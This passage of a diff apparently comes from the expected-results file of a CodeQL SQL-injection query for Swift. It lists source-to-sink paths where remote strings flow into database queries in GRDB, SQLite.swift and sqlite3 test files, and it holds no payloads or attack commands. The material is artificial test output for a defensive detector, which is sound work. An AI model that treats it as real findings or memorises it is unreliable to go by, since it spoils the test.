| call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. 
| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | edges | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | provenance | | | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | provenance | | 
@@ -252,117 +366,3 @@ nodes | sqlite3_c_api.swift:202:31:202:31 | buffer | semmle.label | buffer | | sqlite3_c_api.swift:210:31:210:31 | buffer | semmle.label | buffer | subpaths -#select -| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. 
| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. 
| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. 
| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. 
| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. 
| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. 
